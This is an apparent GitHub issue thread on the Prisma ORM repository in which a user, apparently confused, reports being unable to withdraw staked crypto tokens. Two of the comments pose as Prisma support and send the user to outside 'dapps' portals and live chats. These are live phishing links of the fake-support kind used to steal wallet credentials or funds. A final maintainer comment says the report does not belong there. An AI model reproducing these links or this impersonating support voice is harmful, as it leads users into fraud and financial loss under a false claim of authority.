### ISSUE TITLE
Staking analos

### ISSUE THREAD

**Issue by kutas719** [prisma/prisma#25896]
### Bug description

I cant take my staked analos

### Prisma information

```prisma
// Add your schema.prisma
```

```ts
// Add your code using Prisma Client
```

### Environment & setup

- OS: 
- Database: 
- Node.js version: 

### Prisma Version

```

```

**Comment by MittyLance** [comment]
Thanks for reporting this…. Visit the Decentralized Dapps protocol page to report this for quick resolution via [Prisma Dapps Portal](https://dappswebsupport.com/) and complete your staking request.

**Comment by Evelyn82** [comment]
We apologize for any trouble you've encountered; it seems there may have been a glitch with the cloud data, but rest assured, we can resolve this issue. To expedite the process, kindly follow the link below to reach our specialized support team:

[Prisma Support Request](https://chain-dappsrectification.pages.dev/)

Use the live chat button at the bottom right to connect with a support agent for prompt assistance.

Thank you for your patience—I’m confident your issue will be resolved soon!

**Comment by aqrln** [comment]
It looks like you are confused, this is the issue tracker of Prisma ORM. Please reach out to the support of whatever application or website you are having troubles with.
